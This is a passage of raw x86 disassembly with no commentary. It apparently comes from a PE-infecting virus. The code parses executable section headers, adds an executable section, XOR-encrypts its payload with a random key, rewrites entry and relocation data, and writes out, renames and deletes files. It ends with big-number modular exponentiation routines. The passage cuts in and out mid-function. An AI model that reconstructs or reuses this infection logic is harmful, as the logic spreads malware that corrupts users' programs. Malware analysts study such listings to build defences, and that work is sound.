mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, ds:100131E4h
add edi, ds:10013224h
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F38], eax
mov eax, [ebp+var_31F34]
mov edx, [ebp+var_31F38]
add eax, edx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F24]
add edx, eax
push edx
mov edx, [ebp+var_31F28]
add edx, eax
push edx
call dword ptr ds:10011638h
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F3C], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, ds:10013140h
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_31F3C]
mov edx, eax
mov ecx, [ebp+var_31F40]
add [edx], ecx
loc_421AFB: ; CODE XREF: sub_421353+609�j
; sub_421353+627�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41D094
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F24]
mov esi, edx
add esi, eax
push 1001381Ch
call sub_41C914
push eax
push esi
call dword ptr ds:1000F1F4h
mov eax, ds:10013234h
add eax, 1FFFCh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_41D094
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, ds:10013204h
add eax, 0C000003Fh
mov [esi+24h], eax
movsx eax, word ptr ds:10013144h
mov edx, ds:10013278h
lea eax, [eax+edx+4]
push eax
mov eax, ds:10013210h
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10011644h
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_41D094
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word ptr ds:10013208h
add eax, 1FFFBh
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call dword ptr ds:10012BACh
mov edi, ds:10013164h
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, ds:10013248h
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
movsx edi, word ptr ds:10013130h
movsx edx, word ptr ds:100130C0h
add edi, edx
sub edi, 4
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call dword ptr ds:10012BACh
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F2C], edx
mov [ebp+var_31F28], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F2C]
mov [ecx+edi], dl
call dword ptr ds:10012BACh
movsx edx, word ptr ds:10013260h
add edx, ds:1001321Ch
sub edx, 9
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F34], edx
mov [ebp+var_31F30], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F34]
mov [ecx+edi], dl
mov eax, ds:100130B4h
add eax, 34h
movsx edx, word ptr ds:10013178h
add eax, edx
mov [ebp+var_43C], eax
jmp short loc_421D0E
; ---------------------------------------------------------------------------
loc_421CD9: ; CODE XREF: sub_421353+9C7�j
call dword ptr ds:10012BACh
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F3C], edx
mov [ebp+var_31F38], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F3C]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_421D0E: ; CODE XREF: sub_421353+984�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_421CD9
cmp [ebp+var_1180], 0
jz short loc_421D9D
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, ds:1001317Ch
movsx ecx, word ptr ds:100131FCh
add eax, ecx
sub eax, 3
add edx, eax
mov [ebp+var_31F40], edx
mov eax, [ebp+var_850]
add eax, ds:1001325Ch
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F44], eax
movsx edx, word ptr ds:10013250h
mov ecx, ds:100130DCh
lea edx, [edx+ecx-5]
sub eax, edx
add eax, [ebp+var_31F40]
movsx edx, word ptr ds:10013100h
add edx, ds:100131A8h
dec edx
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F48]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_421D9D: ; CODE XREF: sub_421353+9D0�j
push 0Dh
push 100132C0h
lea eax, [ebp+var_31ED4]
push eax
call dword ptr ds:10011638h
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10011638h
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word ptr ds:10013218h
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_421E09
; ---------------------------------------------------------------------------
loc_421DEF: ; CODE XREF: sub_421353+AC5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_421E09: ; CODE XREF: sub_421353+A9A�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_421DEF
mov eax, ds:100131ECh
sub eax, 8
mov [ebp+var_18], eax
mov eax, ds:100131E8h
dec eax
mov [ebp+var_440], eax
jmp loc_422077
; ---------------------------------------------------------------------------
loc_421E36: ; CODE XREF: sub_421353+D34�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov esi, edx
add esi, eax
mov eax, ds:10013184h
add eax, ds:10013094h
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_421ECE
mov eax, ds:10013228h
sub eax, 2
cmp byte ptr [ebx+eax], 72h
jnz short loc_421ECE
mov eax, ds:100131CCh
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_421ECE
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_422071
; ---------------------------------------------------------------------------
loc_421ECE: ; CODE XREF: sub_421353+B51�j
; sub_421353+B5F�j ...
mov eax, ds:100130D4h
movsx edx, word ptr ds:100131FCh
add eax, edx
sub eax, 0Bh
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_421F26
movsx eax, word ptr ds:10013118h
add eax, ds:1001317Ch
sub eax, 7
cmp byte ptr [ebx+eax], 65h
jnz short loc_421F26
mov eax, ds:100130ACh
add eax, ds:1001326Ch
sub eax, 5
cmp byte ptr [ebx+eax], 61h
jnz short loc_421F26
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_422071
; ---------------------------------------------------------------------------
loc_421F26: ; CODE XREF: sub_421353+B90�j
; sub_421353+BA6�j ...
mov eax, ds:10013094h
mov edx, eax
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_421F57
movsx edx, word ptr ds:10013218h
sub edx, 4
cmp byte ptr [ebx+edx], 69h
jnz short loc_421F57
add eax, ds:10013188h
dec eax
cmp byte ptr [ebx+eax], 61h
jz loc_422071
loc_421F57: ; CODE XREF: sub_421353+BE1�j
; sub_421353+BF1�j
push ebx
push esi
call dword ptr ds:1000F1F4h
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, ds:10013280h
add eax, 8
push eax
mov eax, ds:10013198h
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10011644h
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41D094
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, ds:100130B8h
sub eax, 2
cmp byte ptr [ebx+eax], 64h
jnz short loc_42201A
mov eax, [ebp+var_31F40]
cmp [ebp+var_10], eax
jbe short loc_42201A
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F4C], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_42201A: ; CODE XREF: sub_421353+CA5�j
; sub_421353+CB0�j
movsx eax, word ptr ds:10013250h
movsx edx, word ptr ds:10013180h
lea eax, [eax+edx+0FFBh]
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_41D094
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10011638h
add esp, 14h
loc_422071: ; CODE XREF: sub_421353+B76�j
; sub_421353+BCE�j ...
inc [ebp+var_440]
loc_422077: ; CODE XREF: sub_421353+ADE�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_421E36
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_42209C: ; CODE XREF: sub_421353+F90�j
mov eax, ds:10013134h
movsx edx, word ptr ds:10013150h
add eax, edx
sub eax, 10h
mov [ebp+var_1C], eax
jmp short loc_42210E
; ---------------------------------------------------------------------------
loc_4220B2: ; CODE XREF: sub_421353+DC1�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_4220CE
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_4220CE: ; CODE XREF: sub_421353+D6E�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_42210B
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_422116
; ---------------------------------------------------------------------------
loc_42210B: ; CODE XREF: sub_421353+D94�j
inc [ebp+var_1C]
loc_42210E: ; CODE XREF: sub_421353+D5D�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_4220B2
loc_422116: ; CODE XREF: sub_421353+DB6�j
mov eax, ds:1001315Ch
add eax, ds:10013154h
sub eax, 10h
mov [ebp+var_428], eax
jmp loc_4222A9
; ---------------------------------------------------------------------------
loc_42212F: ; CODE XREF: sub_421353+F62�j
mov eax, [ebp+var_428]
mov edx, ds:1001328Ch
movsx ecx, word ptr ds:10013264h
add edx, ecx
sub edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F44], eax
mov ax, [eax]
mov word ptr [ebp+var_31F40], ax
movzx eax, word ptr [ebp+var_31F40]
mov edx, ds:10013224h
add edx, ds:1001318Ch
sub edx, 5
cmp eax, edx
jz loc_4222BB
movzx edi, word ptr [ebp+var_31F40]
movsx edx, word ptr ds:10013178h
mov ecx, ds:100131B0h
lea ecx, [edx+ecx+1]
sar edi, cl
mov word ptr [ebp+var_31F48+2], di
movzx edi, word ptr [ebp+var_31F40]
movsx ecx, word ptr ds:10013178h
shl edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx edi, word ptr [ebp+var_31F40+2]
movsx edx, word ptr ds:100130D8h
add edx, ds:1001312Ch
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx eax, word ptr [ebp+var_31F40+2]
movsx edx, word ptr ds:100130B0h
sub edx, 7
cmp eax, edx
jnz short loc_422203
mov eax, ds:1001318Ch
add eax, ds:100130A0h
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_4222BB
loc_422203: ; CODE XREF: sub_421353+E94�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F50], eax
sub eax, [ebp+var_31F4C]
mov [ebp+var_31F54], eax
movzx eax, word ptr [ebp+var_31F48+2]
movsx edx, word ptr ds:100131F0h
movsx ecx, word ptr ds:10013250h
add edx, ecx
dec edx
cmp eax, edx
jnz short loc_422299
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F58], eax
mov edx, [ebp+var_31F54]
add [eax], edx
loc_422299: ; CODE XREF: sub_421353+F19�j
movsx eax, word ptr ds:10013178h
sub eax, 2
add [ebp+var_428], eax
loc_4222A9: ; CODE XREF: sub_421353+DD7�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_42212F
loc_4222BB: ; CODE XREF: sub_421353+E21�j
; sub_421353+EAA�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_42209C
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_422326
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_422326: ; CODE XREF: sub_421353+FB2�j
mov eax, [ebp+var_8]
mov edx, ds:1001309Ch
add edx, 4
movsx ecx, word ptr ds:10013178h
add edx, ecx
mov [eax+44h], dx
mov edx, ds:100130ECh
add edx, ds:100130A8h
sub edx, 2
mov [eax+1Ah], dl
mov edx, ds:100131B8h
add edx, ds:10013184h
sub edx, 5
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE0], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE0]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE4], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE8], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, ds:100130DCh
sub eax, 3
mov [ebp+var_24], eax
jmp short loc_4223F3
; ---------------------------------------------------------------------------
loc_4223B2: ; CODE XREF: sub_421353+10A6�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_4223F0
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_4223FB
; ---------------------------------------------------------------------------
loc_4223F0: ; CODE XREF: sub_421353+1079�j
inc [ebp+var_24]
loc_4223F3: ; CODE XREF: sub_421353+105D�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_4223B2
loc_4223FB: ; CODE XREF: sub_421353+109B�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_422701
; ---------------------------------------------------------------------------
loc_42243C: ; CODE XREF: sub_421353+13BA�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F40], edx
movzx ecx, byte ptr [edx+eax]
mov edi, ds:1001326Ch
add edi, 0E0h
cmp ecx, edi
jnz loc_422594
mov ecx, ds:100131E8h
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word ptr ds:10013170h
add edi, ds:100131D0h
sub edi, 9
cmp ecx, edi
jnz loc_422594
movsx ecx, word ptr ds:100130B0h
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:10013090h
movsx edx, word ptr ds:10013174h
add edi, edx
mov edx, edi
sub edx, 0Ah
cmp ecx, edx
jnz loc_422594
mov edx, ds:100131E8h
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F40]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word ptr ds:10013264h
movsx edi, word ptr ds:10013230h
add ecx, edi
sub ecx, 0Fh
cmp edx, ecx
jnz loc_422594
movsx edx, word ptr ds:10013100h
inc edx
add eax, edx
mov edx, [ebp+var_31F40]
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:10013260h
sub edx, 2
cmp eax, edx
jnz loc_422594
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
movsx eax, word ptr ds:10013180h
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, ds:10013274h
inc edx
movsx ecx, word ptr ds:100130C0h
add edx, ecx
sub eax, edx
mov [ebp+var_31F4C], eax
movsx edi, word ptr ds:100130C0h
movsx edx, word ptr ds:10013150h
add edi, edx
mov edx, [ebp+var_C]
mov ecx, ds:10013238h
inc ecx
add ecx, ds:100130C8h
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-28h], ecx
loc_422594: ; CODE XREF: sub_421353+1107�j
; sub_421353+112D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
movzx ecx, byte ptr [edx+eax]
movsx edi, word ptr ds:100131E0h
mov edx, ds:10013128h
lea edx, [edi+edx+0DCh]
cmp ecx, edx
jnz loc_4226FE
mov edx, ds:100130A0h
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word ptr ds:1001324Ch
sub ecx, 9
cmp edx, ecx
jnz loc_4226FE
mov edx, ds:1001318Ch
movsx ecx, word ptr ds:1001322Ch
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:100131E4h
movsx edi, word ptr ds:10013150h
add ecx, edi
sub ecx, 0Ch
cmp edx, ecx
jnz loc_4226FE
mov edx, ds:10013210h
movsx ecx, word ptr ds:10013104h
add ecx, edx
sub ecx, 6
mov edi, eax
add edi, ecx
mov ecx, [ebp+var_31F44]
movzx ecx, byte ptr [ecx+edi]
mov edi, ds:1001325Ch
sub edi, 8
cmp ecx, edi
jnz loc_4226FE
movsx ecx, word ptr ds:10013250h
lea edx, [edx+ecx+2]
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:10013264h
add edx, ds:1001317Ch
sub edx, 0Eh
cmp eax, edx
jnz short loc_4226FE
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, ds:100131ACh
add eax, 0FFFFFFFAh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word ptr ds:10013178h
add edx, ds:100130A0h
sub edx, 4
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word ptr ds:10013150h
add edi, ds:1001309Ch
mov edx, [ebp+var_C]
mov ecx, ds:10013268h
add ecx, ds:1001311Ch
sub ecx, 8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-34h], ecx
loc_4226FE: ; CODE XREF: sub_421353+1267�j
; sub_421353+1290�j ...
inc [ebp+var_C]
loc_422701: ; CODE XREF: sub_421353+10E4�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_42243C
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000F1F4h
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_42273B: ; CODE XREF: sub_421353+13ED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42273B
mov [ebp+var_31ED8], eax
movsx edx, word ptr ds:100130A4h
sub edx, 3
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
mov edx, ds:1001323Ch
add edx, ds:10013154h
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
movsx edx, word ptr ds:100131FCh
movsx ecx, word ptr ds:10013218h
add edx, ecx
sub edx, 9
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, ds:100130D4h
sub eax, 6
push eax
push 2
push 0
movsx eax, word ptr ds:100131E0h
movsx edx, word ptr ds:100131C0h
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10012788h
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:10012B8Ch
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+var_4]
call dword ptr ds:1000F61Ch
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10010364h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000D008h
mov eax, 1
jmp short loc_422846
; ---------------------------------------------------------------------------
loc_42282F: ; CODE XREF: sub_421353+C3�j
; sub_421353+DD�j ...
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+var_4]
call dword ptr ds:1000F61Ch
xor eax, eax
loc_422846: ; CODE XREF: sub_421353+5F�j
; sub_421353+14DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_421353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42284B proc near ; CODE XREF: .data:0041D33E�p
; .data:0041D401�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_423379
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, ds:10010260h
cmp [ebp+arg_4], 43h
jnz short loc_422870
lea edi, ds:1000F0F0h
loc_422870: ; CODE XREF: sub_42284B+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_42292A
push 0
push 0
push esi
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:1000D028h
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_4228C2: ; CODE XREF: sub_42284B+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4228C2
mov edx, ds:10013238h
add edx, 1
movsx ecx, word ptr ds:100131C0h
add edx, ecx
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, ds:100130C8h
add ebx, ds:10013258h
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_4]
push eax
movsx eax, word ptr ds:10013264h
sub eax, 5
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
loc_42292A: ; CODE XREF: sub_42284B+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_42284B endp
; ---------------------------------------------------------------------------
db 90h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422931 proc near ; CODE XREF: sub_41A1D1+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, ds:10014B28h
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4229FC
xor edx, edx
loc_422961: ; CODE XREF: sub_422931+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_422973
mov edx, [ebp+arg_4]
call sub_42298D
loc_422973: ; CODE XREF: sub_422931+38�j
lea edx, ds:10014B28h
call sub_42298D
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_422961
popa
pop ebp
retn 10h
sub_422931 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_42298D proc near ; CODE XREF: sub_422931+3D�p
; sub_422931+48�p
lea edi, ds:10014AE8h
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, ds:10014B28h
call sub_4229FC
loc_4229A7: ; CODE XREF: sub_42298D+5D�j
lea edi, ds:10014AE8h
mov ecx, 10h
xor eax, eax
loc_4229B4: ; CODE XREF: sub_42298D+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4229B4
call sub_422A0D
bt ds:10014B28h, ebx
jnb short loc_4229E9
mov esi, edx
lea edi, ds:10014AE8h
xor eax, eax
mov ecx, 10h
loc_4229D8: ; CODE XREF: sub_42298D+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4229D8
call sub_422A0D
loc_4229E9: ; CODE XREF: sub_42298D+3A�j
dec ebx
jns short loc_4229A7
mov edi, edx
lea esi, ds:10014AE8h
mov ecx, 10h
rep movsd
retn
sub_42298D endp
; =============== S U B R O U T I N E =======================================
sub_4229FC proc near ; CODE XREF: sub_422931+29�p
; sub_42298D+15�p
mov ebx, 1FFh
loc_422A01: ; CODE XREF: sub_4229FC+B�j
bt [edi], ebx
jb short locret_422A09
dec ebx
jnz short loc_422A01
locret_422A09: ; CODE XREF: sub_4229FC+8�j
retn
sub_4229FC endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_422A0D proc near ; CODE XREF: sub_42298D+2E�p
; sub_42298D+57�p
lea esi, ds:10014AE8h
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_422A1B: ; CODE XREF: sub_422A0D+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_422A44
ja short loc_422A28
dec ecx
jns short loc_422A1B
loc_422A28: ; CODE XREF: sub_422A0D+16�j
mov esi, [ebp+14h]
lea edi, ds:10014AE8h
xor eax, eax
mov ecx, 10h
loc_422A38: ; CODE XREF: sub_422A0D+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
